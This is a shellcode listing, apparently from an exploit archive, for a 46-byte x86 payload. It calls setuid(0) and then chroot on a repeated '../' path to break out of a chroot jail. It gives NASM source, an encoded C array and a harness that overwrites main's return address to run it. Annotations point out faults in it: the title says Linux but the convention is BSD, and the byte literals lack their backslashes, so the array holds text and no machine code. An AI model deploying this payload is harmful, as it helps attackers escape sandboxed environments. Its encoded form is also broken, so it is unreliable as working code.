# Title : linux/x86 break chroot 46 bytes
# Published : 2004-09-12
# Author : dev0id
/* setuid(0) + chroot() shellcode.
It builds the path '../' repeated 10 times at run time and passes it to chroot().
Size 46 bytes
OS *BSD
/rootteam/dev0id (www.sysworld.net)
dev0id@uncompiled.com
; ----------------------------------------------------------------------
; Syntax: NASM (Intel operand order), 32-bit x86.
; Purpose: calls syscall 0x17 with argument 0, builds the string "../"
;          repeated 10 times in the bytes that follow the code, then calls
;          syscall 0x3d with a pointer to that string. The header of this
;          comment names the two calls as setuid(0) and chroot().
; Calling convention: arguments are pushed on the stack before int 0x80,
;          which fits the "OS *BSD" line in the header rather than the
;          "linux/x86" page title (Linux i386 passes arguments in registers).
; Memory:  the scratch string is written starting at the address that
;          "call main" pushes, i.e. directly after the last code byte, so
;          the code needs memory that is both writable and executable.
; Review notes: both calls are visible to syscall auditing as syscall 0x17
;          with argument 0 followed by syscall 0x3d on a path made only of
;          "../" components. There is no exit or exec in this listing;
;          after the second int 0x80 execution falls into callme again.
; Registers: esi = start of scratch string, edi = store cursor,
;          ecx = repeat/loop counter, eax = syscall number / fill byte.
; ----------------------------------------------------------------------
BITS 32
jmp short callme            ; go to the call at the end so it can push an address
main:
pop esi                     ; esi = address pushed by "call main" (first byte after the code)
mov edi,esi                 ; edi = destination pointer for the stosb stores below
xor ecx,ecx                 ; ecx = 0
push ecx                    ; argument for the first syscall: 0
mov al,0x17                 ; syscall number 0x17 (setuid per the header); only AL is written
push eax                    ; extra dword above the argument - presumably the placeholder slot of the BSD int 0x80 convention; confirm
int 0x80                    ; first syscall
xor eax,eax                 ; eax = 0
push eax                    ; keep a zero on the stack; popped below to write the terminator
mov cl,0x1e                 ; count = 30 (relies on the upper bytes of ecx still being zero)
mov al,0x2e                 ; fill byte '.'
repne stosb                 ; store AL at [edi] ecx times: 30 '.' bytes (F2 prefix on stosb, used here as a plain repeat)
pop eax                     ; eax = 0 again
stosb                       ; NUL terminator at offset 30
mov cl,0x1e                 ; index = 30 for the fix-up loop
main_loop:
; Each pass lowers ecx by 3 (dec, dec, loop) and touches indices 29, 26, ..., 2,
; turning every third '.' (0x2e) into '/' (0x2f): ten passes give "../" x 10.
dec cl
inc byte [esi+ecx]          ; '.' + 1 = '/'
dec cl
loop main_loop              ; ecx -= 1, repeat while ecx != 0
push esi                    ; argument for the second syscall: pointer to the "../" string
mov al,0x3d                 ; syscall number 0x3d (chroot per the header); eax is 0 before this
push eax                    ; same extra dword as before the first syscall
int 0x80                    ; second syscall
callme:
call main                   ; pushes the address of the byte after this instruction, then jumps to main
*/
/*
 * Encoded form of the listing above, one literal per instruction so the
 * hex pairs can be checked against the assembly (46 pairs in total).
 *
 * NOTE(review): as printed on this page the literals contain plain 'x'
 * characters (the backslashes of the hex escapes are absent), so the array
 * holds 138 characters of text plus a NUL, not 46 machine-code bytes.
 */
char shellcode[] =
    "xebx27"            /* jmp short callme        */
    "x5e"               /* pop esi                 */
    "x89xf7"            /* mov edi,esi             */
    "x31xc9"            /* xor ecx,ecx             */
    "x51"               /* push ecx                */
    "xb0x17"            /* mov al,0x17             */
    "x50"               /* push eax                */
    "xcdx80"            /* int 0x80                */
    "x31xc0"            /* xor eax,eax             */
    "x50"               /* push eax                */
    "xb1x1e"            /* mov cl,0x1e             */
    "xb0x2e"            /* mov al,0x2e             */
    "xf2xaa"            /* repne stosb             */
    "x58"               /* pop eax                 */
    "xaa"               /* stosb                   */
    "xb1x1e"            /* mov cl,0x1e             */
    "xfexc9"            /* main_loop: dec cl       */
    "xfex04x0e"         /* inc byte [esi+ecx]      */
    "xfexc9"            /* dec cl                  */
    "xe2xf7"            /* loop main_loop          */
    "x56"               /* push esi                */
    "xb0x3d"            /* mov al,0x3d             */
    "x50"               /* push eax                */
    "xcdx80"            /* int 0x80                */
    "xe8xd4xffxffxff";  /* callme: call main       */
/*
 * Test harness for the shellcode array.
 *
 * It takes the address of its only local, steps two ints above it and
 * stores the address of shellcode[] there. On the frame layout the author
 * presumably had in mind (local, saved frame pointer, return address) that
 * slot is main's saved return address, so returning from main would
 * transfer control into the array - TODO confirm for the compiler in use.
 *
 * NOTE(review): the slot position depends entirely on how the compiler lays
 * out the frame, so this is undefined behaviour in C. Stack protectors and
 * non-executable data pages are the mitigations that stop this pattern.
 * The assignment stores a pointer into an int without a cast, and the
 * function has no return statement.
 */
int
main(void)
{
/* the only local; its own address is the reference point in the frame */
int *ret;
/* two int-sized slots above 'ret' */
ret = (int*)&ret + 2;
/* overwrite that slot with the address of the array */
(*ret) = shellcode;
}